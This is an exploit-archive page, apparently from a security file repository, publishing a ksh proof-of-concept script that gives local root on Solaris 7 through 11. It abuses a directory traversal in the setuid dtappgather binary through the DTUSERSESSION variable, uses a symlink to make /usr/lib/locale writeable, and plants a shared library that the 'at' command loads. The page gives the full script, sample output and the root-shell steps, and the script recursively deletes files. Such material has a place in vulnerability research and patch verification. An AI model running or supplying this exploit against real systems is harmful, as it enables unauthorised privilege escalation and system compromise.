Solaris x86 / SPARC EXTREMEPARR dtappgather Privilege Escalation

Solaris x86 / SPARC EXTREMEPARR dtappgather Privilege Escalation: Posted Apr 13, 2017; Authored by Hacker Fantastic; Solaris versions 7 through 11 on both x86 and SPARC suffer from an EXTREMEPARR dtappgather local privilege escalation vulnerability.; tags | exploit, x86, local; systems | solaris; SHA-256 | 1d0a7fc97f6c11277cffbbde3faa1e5dcaa3c351527a2b971ea140cbd1503bbb; Download | Favorite | View

Solaris x86 / SPARC EXTREMEPARR dtappgather Privilege Escalation

#!/bin/ksh
#Exploit PoC reverse engineered from EXTREMEPARR which provides
#local root on Solaris 7 - 11 (x86 & SPARC). Uses a environment
#variable of setuid binary dtappgather to manipulate file
#permissions and create a user owned directory anywhere on the
#system (as root). Can then add a shared object to locale folder
#and run setuid binaries with an untrusted library file.
#
# e.g.
# $ id;uname -a; ./dtappgather-poc.sh
# uid=60001(nobody) gid=60001(nobody)
# SunOS sparc 5.8 Generic_117350-39 sun4m sparc SUNW,SPARCstation-20
# [+] '/usr/dt/bin/dtappgather' directory traversal exploit
# [-] get rid of any of our desktop files
# [-] exploiting the traversal bug...
# changePermissions: /var/dt/appconfig/appmanager/..| : No such file or directory
# MakeDirectory: /var/dt/appconfig/appmanager/..: File exists
# changePermissions: /var/dt/appconfig/appmanager/..| : No such file or directory
# [-] symlink attack create our directory
# dr-xr-xr-x   2 nobody   nobody       512 Apr 11 14:40 pdkhax
# [-] Done. "/usr/lib/locale/pdkhax" is writeable
# $ 
#
# To get root privileges simply exploit "at" by adding a .so.2
# file in the new locale directory and calling "at".
#
# $ at -f /etc/passwd 11:11
# job 1491991860.a at Ons Apr 12 11:11:00 2017
# $ LC_TIME=pdkhax at -l
# # id
# uid=0(root) gid=60001(nobody)
# 
# -- Hacker Fantastic (www.myhackerhouse.com)
echo "[+] '/usr/dt/bin/dtappgather' directory traversal exploit"
echo "[-] get rid of any of our desktop files"
chmod -R 777 /var/dt/appconfig/appmanager/*
rm -rf /var/dt/appconfig/appmanager/*
echo [-] exploiting the traversal bug...
DTUSERSESSION=. /usr/dt/bin/dtappgather
DTUSERSESSION=. /usr/dt/bin/dtappgather
DTUSERSESSION=.. /usr/dt/bin/dtappgather
DTUSERSESSION=.. /usr/dt/bin/dtappgather
DTUSERSESSION=.. /usr/dt/bin/dtappgather
echo [-] symlink attack create our directory 
ln -sf /usr/lib/locale /var/dt/appconfig/appmanager
DTUSERSESSION=pdkhax /usr/dt/bin/dtappgather
ls -al /usr/lib/locale | grep pdkhax
rm -rf /var/dt/appconfig/appmanager
chmod 755 /usr/lib/locale/pdkhax
echo [-] Done. "/usr/lib/locale/pdkhax" is writeable

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Solaris x86 / SPARC EXTREMEPARR dtappgather Privilege Escalation

Solaris x86 / SPARC EXTREMEPARR dtappgather Privilege Escalation

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Solaris x86 / SPARC EXTREMEPARR dtappgather Privilege Escalation

Share This

Solaris x86 / SPARC EXTREMEPARR dtappgather Privilege Escalation

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems